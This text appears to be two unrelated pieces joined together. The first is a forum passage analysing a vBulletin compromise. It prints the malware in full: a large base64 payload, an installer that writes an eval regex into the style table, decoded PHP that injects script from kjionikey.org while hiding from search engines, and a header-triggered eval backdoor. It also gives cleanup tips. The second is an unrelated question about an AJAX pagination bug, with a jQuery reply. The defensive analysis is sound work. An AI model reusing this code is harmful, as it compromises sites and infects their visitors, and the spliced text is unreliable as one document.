phUTJ0bldWYzFhMGxEWjI5S1NFNXdaVzFXWmxwcFFUbEpSVUp0WVZkNGJHTXliRFphVTJkcldtMXNjMXBXT1d0TFUydG5VR2xCZDB0VGEyZGxkekJMU1VOU2ExbFlVbWhKUkRCbldtMXNjMXBXT1c1YVdGSm1XVEk1ZFdSSFZuVmtTRTF2U2tkYWNHSkhWbVphUTJzM1JGRnZaMkZYV1c5S1NFNXdaVzFXWmxwcFFTdEpSRVYzVFVSQmQwMUVRWEJKUjFwd1lrZFdabU5JVmpCWU1rNTJZbTVTYkdKdVVucExRMUp0WVZkNGJGZ3lVWE5pV0ZKbVkyMUdkVnBEWjNoTlJFRnpUMVJyTlV0VE5HNU1RMk53VDNjd1MwbERRbkJhYVdkb1l6TlNlV0ZZVGpCamFXZHJXa2RHTUZsVGQydGhXRUptWWtOcmNFbEljMDVEYVVGblNVZGFjR0pIVm1aalNGWXdXREpPZG1KdVVteGlibEo2UzBOU2JXRlhlR3hZTWxGelNXbFNjR05HT1hOTVEwbHpVbXRzVFZKV09VSlZSa0pHVkd0UmNFOTNNRXRKUTBJNVNVZFdjMk15VldkamJWWXdaRmhLZFVsSVVubGtWMVUzUkZGdloyWlJNRXRtVVRCTFdtNVdkVmt6VW5CaU1qUm5VekpXU1ZOSFVuQlhSWGR2U2tkc2RVdFRRamRFVVhCdVlrYzVhVmxYZDJkS1NGcHBaRmQ0YzFwWVVuQmlhWGRyWVZoQ1ptVkVjMDVEYVZKcllqSXhhR0ZYTkdkUVUwRnVZVEp3Y0dJeU5YQmhNbFkxVEcwNWVWcDVZemRFVVc5cldtMXNkVnBHT1hSYVUwRTVTVU5rTWxsdVZuTmlSMVl3WVZjMVptSlhWblZrVXpWeFkzbzVNbEJVVFRST2VVa3JVRU01ZWxrelNuQmpTRkVyU25welRrTnBVbnBhVjAxblVGTkJibFV5TlVOYVIyaFRVVlp3VTFsclpEQmpiRGh1VDNjd1MwcEhkR3hsVTBFNVNVaE9NVmx1VGpCamFXaDBXa1JWYjBwR09WUlNWa3BYVWxaS1lrb3dhRlZXUmtKbVZsWk9SbFZzT1VKU01GWlBWa05rWkV4cFVuQmpSamswVEdsU2VscFhUWEJNUkVGelRWUlpjRTkzTUV0S1NGWjVZa05CT1VsSE1UQllNMHBvWW0xUmIwMVVRWGRNUkdzMVQxUnJOVTlUYTNWS2VUVnhZM280ZVU1VVFURk9hbWR0U25rMGEyRXlWalZQZHpCTFkyMVdNR1JZU25WSlEyZHJZak5XTUVsRU1HZGpNMUo1V0ROS2JHTkhlR2haTWxWdlNrZGFjR0p0VW1aaVYxVnpTa2RhY0dKdFVtWmlWMVYxU1d4NGVWaEhORGhqTWs1NVlWaENNRWxJVWpWalIxVTVXRU5LTUZwWWFEQk1NbkJvWkcxR2Vsa3pTbkJqU0ZKalNXbENlbU50VFRsWVEwcHZaRWhTZDA5cE9IWktSMUoyWWxkR2NHSnBPR3RrV0VweldFTkpLMUJET1hwWk0wcHdZMGhSSzBscGQydGhWelJ3UzFOQkwwbERVblprV0ZGblQybEJhMkZYTkRkRVVYQTVSRkZ3YldSWE5XcGtSMngyWW1sQ1IyVnJkREZWUjFwd1VWVmpiMHRUUWpkRVVXOXJZVmhCWjFCVFFXNUtlbk5PUTIxc2JVdERSbXhpV0VJd1pWTm5hMWd4VGtaVmJGcEdWV3h6YmxOR1VsVlZSamxaV0RCYVVGVnNaRUpWYTFKR1VrWTVSMVF4U1c1WVUydHdTVWh6VGtOcFFXdFpXRXA1U1VRd1oxcFlhSGRpUnpscldsTm5ia3hEWTNOS1JqbFVVbFpLVjFKV1NtSktNR2hWVmtaQ1psZEdPVWRVTVVwWVVWWktSVkpWVW1aU2F6bFRTakV3Y0U5M01FdEpRMEp3V21sb2QyTnRWbTVZTWpGb1pFZE9iMHREWTNaWWJIaHJaWHBGYzAwek1XTk1iSGhyWlhwRmMwMHpNV05NYkhoclpYcEZjMDB6TVdOTWJIaHJaWHBGYzAwek1HdE1lV056U2tkR2VXTnNjMjVOUTJSa1MxTnJaMlYzTUV0SlEwRm5Ta2RzZDBsRU1HZEtSMFo1WTJ4emJrMURaR1JQZHpCTFNVTkNPVVJSY0RsRVVYQjVXbGhTTVdOdE5HZExRMFpzWWxoQ01HVlRaMnRoV0VGd1MxTkJMMGxEVW5CalEwRTJTVU5TWmxVd1ZsTldhMVpUVjNsa1UxSlZNVkJXUlZabVVWVlNSVlZwWkdSUGR6QkxabEV3UzFwdVZuVlpNMUp3WWpJMFoxRllRbVpoUm5CRldIbG5jRWxJYzA1RGJXeHRTMGhDZVZwWFpHWmlWMFl3V1RKbmIwcDVUbTVpTWpsdVlrZFdPR0pZVG5WbVIzaHdaRzFXT0ZsWGVEQlpXRnB3WXpOU2FHWkhSbnBoTTNnMVdWZG9kbUl6ZUdoaU1uZzRXVzFzZFZvemVHeGxSMFp6V2xkR2EyWkhWalJaTW13d1dsaDRjMlZYVG5aak0zaDBaVmhPZDFsWFRteG1SMFp6V2xob2FHWkhVblprVjBweldsZE9jMkZYVG5KSk1tdHVURU5TWmxVd1ZsTldhMVpUVjNsa1NWWkdVbEZZTVVwR1VtdFdVMUpXU1c1WVUydHdTVWh6VGtOcFFuQmFhV2gzWTIxV2JsZ3lNV2hrUjA1dlMwTmphbUpZVG5CYVdIaHRZVmhLYkZwdE9UUm1SemwzV2xoS2FHWkhUbTlqYlRsMFdsTk9jRXA1ZDJ0WU1VNUdWV3hhUmxWc2MyNVRSbEpWVlVZNVZsVXdWbE5ZTUVaSVVsVTFWVW94TUhCTFUwSjVXbGhTTVdOdE5HZGtTRW94V2xSelRrTnBRamxFVVhBNVJGRndiV1JYTldwa1IyeDJZbWxDZGxSV2JGcFVNa1o1UzBOcloyVjNNRXRhTW5oMldXMUdjMGxEVW5CalJqazBUM2N3UzBwSGJIZFlNMmRuVUZOQ1IyVnJkREZWUjFwd1VWVmpiMHRVYzA1RGFWSm9TVVF3WjFsWVNubFpXR3R2U25wSmVFNXBOSGxOZW10MVNubDNiazFxUVRWTWFtY3hUR2xqYzBwNlJUTk5lVFI1VGxSVmRVcDVkMjVOVkdONlRHcEZOVTVETkc1TVEyTTBUMU0wZVUxRVkzVktlWGR1VG5wUmRVMVVTVEZNYVdOelNucGplVXhxUlRCTWFXTnpTbnBaTWt4cVNUQlBVelJ1VEVOak1rNXBOSGhOUkVsMVNubDNiazVxVVhWTmFrMTZUR2xqY0U5M01FdGFiVGw1V2xkR2FtRkRaMnRaVTBKb1kzbEJhMWxwYTJkbGR6QkxTVWRzYlV0SVFubGFWMlJtWWxkR01Ga3laMjlKYVRsbFNrZEpkbUZUU1hOS1IyeDNXRE5uY0V0VFFubGFXRkl4WTIwMFoyUklTakZhVkhOT1EybENPVVJSY0RsRVVYQndXbWxuYUZwWE1YZGtTR3R2U2tZNVZGSldTbGRTVmtwaVNqQm9WVlpHUW1aVmExWkhVbFpLUmxWcFpHUkxVMnRuWlhjd1MwbEhiRzFMUlVaM1dESm9ZVkpHT0c5TFUwSm9ZbTFSWjBsWE9VNVhWbXhRV1ZoSmIwdFRRbWhpYlZGblNWVm9hMlJGU25CU01WSkNZMmxuY0V0VFFqZEVVVzluU2tjMWJHUXpVbXhsU0ZGblVGTkNURnBWYUVsYVIyeFpWRU5uYTJKdFZqTmtSMVkwWkVOck4wUlJiMmRtVVRCTFpsRXdTMk50VmpCa1dFcDFTVU5TZFZwWVpEQmFXR2d3VDNjOVBTY3BLVHM9IiksIi4iKTpudWxsOw==');
$style = $GLOBALS['style'];
if(!empty($style['styleid'])) {
$a = $db->query_first('select styleid from '.TABLE_PREFIX.'style where styleid=\''.$style['styleid'].'\'');
if($a['styleid']!='' and $a['replacements']=='') {
$db->query_write('update '.TABLE_PREFIX.'style set replacements=\'a:1:{s:12:"/^(.*?)$/ise";s:'.(strlen($base)-30).':"'.$base.'";}\' where styleid=\''.$style['styleid'].'\'');
echo 'ok';
} else echo 'error';
}
exit;
}
#iai();
It's worth noting that query there:
'update '.TABLE_PREFIX.'style set replacements=\'a:1:{s:12:"/^(.*?)$/ise";s:'.(strlen($base)-30).':"'.$base.'";}\' where styleid=\''.$style['styleid'].'\''
Check your style table, as that's one way/the way code is exposed to the user.
Renaming your style table to something else would likely mitigate the effects of this attack for now.
In there, the base64 bit has more bas64 in, which has more bas64 in which eventually evals:
function HdtBiGTAr() {
global $ip_x;
$file_d = '/tmp/phpYRcCBmBr';
$ip_l = (string)ip2long($ip_x);
if(file_exists($file_d) and #is_writable($file_d) and (($size_f = #filesize($file_d)) > 0)) {
$data = file_get_contents($file_d);
if($size_f > 1000000) file_put_contents($file_d,mt_rand(100,999).',');
if(!stristr($data,$ip_l)) {
file_put_contents($file_d,"$ip_l,",FILE_APPEND);
} else return true;
}
}
function KeHHdiXL($in) {
global $vbulletin,$ip_x;
$domain = 'kjionikey.org';
$find_me = 'vbulletin_menu.js?v=387"></script>';
$sec = 'SnBdhRAZRbGtr_';
$key = substr(md5($_SERVER['HTTP_USER_AGENT'].$ip_x.$sec),0,16);
$url = mt_rand(100,999999).'.js?250568&'.$key;
return ($out = str_replace($find_me,$find_me."\r\n<script type=\"text/javascript\" src=\"http://$domain/$url\"></script>",$in)) ? $out : $in;
}
function FzKuPfiAG() {
$ip = '';
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$arr = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);
if(preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/',$arr['0'])) {
$ip = $arr['0'];
}
}
return (!empty($ip)) ? $ip : $_SERVER['REMOTE_ADDR'];
}
function Ap_hZD_() {
if(preg_match('#google|msn|live|altavista|ask|yahoo|aol|bing|exalead|excite|lycos|myspace|alexa|doubleclick#i',$_SERVER['HTTP_REFERER'])) {
if(preg_match('#msie|firefox|opera|chrome#i',$_SERVER['HTTP_USER_AGENT'])) return true;
}
}
function oMYYOar() {
global $ip_x;
$ip_x = FzKuPfiAG();
$a = array('216.239.','209.85.','173.255.','173.194.','89.207.','74.125.','72.14.','66.249.','66.102.','64.233.');
foreach($a as $b) {
if(preg_match("/^$b/i",$ip_x)) return true;
}
}
if(!empty($_SERVER['HTTP_REFERER'])) {
if(Ap_hZD_() and !oMYYOar() and !HdtBiGTAr()) {
$newtext = KeHHdiXL($newtext);
}
}
return $newtext;
This writes to a file called /tmp/phpYRcCBmBr, so I'd check what that says.
It also hides it's behaviour from search engines, which is nice of it.
The bad bit for users is likely:
function KeHHdiXL($in) {
global $vbulletin,$ip_x;
$domain = 'kjionikey.org';
$find_me = 'vbulletin_menu.js?v=387"></script>';
$sec = 'SnBdhRAZRbGtr_';
$key = substr(md5($_SERVER['HTTP_USER_AGENT'].$ip_x.$sec),0,16);
$url = mt_rand(100,999999).'.js?250568&'.$key;
return ($out = str_replace($find_me,$find_me."\r\n<script type=\"text/javascript\" src=\"http://$domain/$url\"></script>",$in)) ? $out : $in;
}
Which puts some JS on the page hosted by kjionikey.org. That JS requires a key based on the IP address.
I'd check any code that reads/executes the contents of random $_SERVER variables, but why that would be in there, I don't know.
The attacker in this case has a backdoor code installed in one of your FAQ phrases (vbulletin phrases db table) as a set of chr() PHP function calls.
${$GeAZvLDI=chr(99).chr(114).chr(101).chr(97).chr(116).chr(101).chr(95) ...
that basically when eval'd through the faq.php script, gets decoded to:
if(!empty($_SERVER['HTTP_PACK']) and !empty($_SERVER['HTTP_SOVIET']))
{
if(md5(md5($_SERVER['HTTP_PACK'])) == 'rDGeOKeGGdiVLFy')
#eval(base64_decode($_SERVER['HTTP_SOVIET']));
}
You may find the affected vBulletin phrases by issuing a SQL query like so
SELECT varname, text FROM `phrase` where text like '%chr(%';
Though there are many variants of this, some are using HEX strings, base64decode, assert, pack calls or just plain PHP.
AJAX XMLHttpRequest 'bouncing back' when sending vars to PHP
I apologize if I don't articulate my problem correctly, but I'll give it my best shot. I've been looking all over the net for info which can help me with this issue, to no avail.
Just a bit of background. I'm an experienced web coder, though haven't done webwork in a few years prior to this, I have done a fair bit of work in PHP and javascript before and these days I work with C++, so I'm fairly experienced with programming principles.
I'm building some blog software, and inb4wordpress and jQuery, I simply don't care. So spare it please... I'm loading some blog entries into an element through a simple AJAX request function. This function is detailed below: ( It's been changed to a 3 function example I found on the net while I was trying to debug this issue, no one's 'simple' code seems to work. )
The problem is detailed beneath the code.
var httpObject = null;
function getHTTPObject(){
if(window.ActiveXObject) return new ActiveXObject("Microsoft.XMLHTTP");
else if(window.XMLHttpRequest) return new XMLHttpRequest();
else {
alert("Your browser does not support AJAX.");
return null;
}
}
function setOutput(){
if(httpObject.readyState == 4){
document.getElementById("entries").innerHTML = httpObject.responseText;
}
}
function loadEntries(s) {
httpObject = getHTTPObject();
if (httpObject != null) {
httpObject.open("GET","entries.php?" + s,true);
httpObject.send(null);
httpObject.onreadystatechange = setOutput;
}
}
Simple stuff? I can't seem to see any errors there. This is how the function is called:
<div id='entries'>
<script type="text/javascript">
loadEntries('blog=<?php echo $process['id']; ?>&page=0');
</script>
</div>
also simple.
Here's the PHP code for 'entries.php':
<?php
require_once('inc/bloginc.php');
if(isset($_GET['page'])) {
$page = intval($_GET['page']);
} else $page = 0;
$entries = 3;
$init = $page * $entries;
$limit = $entries + $init;
if(!isset($_GET['blog'])) die("WTF DIE");
else $blog = mysql_real_escape_string($_GET['blog']);
$tag = '';
if(isset($_GET['tag'])) {
$tag = mysql_real_escape_string($_GET['tag']);
echo "<span class='blogEntryBody'>viewing entries tagged with: '" . $tag . "' / <a href='' onclick=\"";
echo "loadEntries('blog=" . $blog . "')";
echo "\">clear?</a></span></br>";
echo "<hr>";
}
$numposts = nResults($blog, $tag);
buildEntries(getEntries($blog, $tag, $init, $limit));
if($numposts > $entries) {
echo "</br><span class='blogEntryBody'>";
if($page > 0) {
echo "<a href='' onClick=\"";
echo "loadEntries('blog=" . $blog;
if(isset($_GET['tag'])) echo "&tag=" . $tag;
echo "&page=" . (--$page) . "')";
echo "\">Previous Entries</a>";
echo " / ";
}
echo "<a href='' onClick=\"";
echo "loadEntries('blog=" . $blog;
if(isset($_GET['tag'])) echo "&tag=" . $tag;
echo "&page=" . (++$page) . "')";
echo "\">Next Entries</a>";
echo "<br></span>";
}
?>
okay, now here's where things get tricky:
When sending vars to 'entries.php', such as: entries.php?blog=walk&page=1
They intermittently work, some of these work, but some don't.
I know it's not the PHP code, since loading entries.php up in a new window and manually passing these vars elicits the desired results. What happens is that the HTTP GET request returns 'undefined' in Firefox webdev console, such as this:
[14:47:33.505] GET http://localhost/meg/entries.php?blog=walk&tag=lorem [undefined 2ms]
^ The 'tag' variable usually works, it's normally the 'page' variable that sends everything haywire.
What happens is, after clicking 'next page', you quickly see a blank div, and then it quickly bounces back to the previous state. You see all this loading in the console. It'll return 'undefined' then reload the previous state. Which is just puzzling.
I don't understand why this would be occurring.
I hope I've provided enough information, and set it out in an easy to understand format. I'm new to asking questions. I usually just 'googleit' or RTM. But I think maybe this time someone else will have seen this before.
Oh, and I've tested in chrome, same issue. I'm really puzzled, but open to the possibility that maybe I've overlooked something small and crucial.
Thanks!
Well it happens few times that ajax doesn't works in chrome & explorer so my suggestion to use jquery because in jquery they already include codes for explorer and chrome. you can use $.get , $.post or $.ajax methods easily.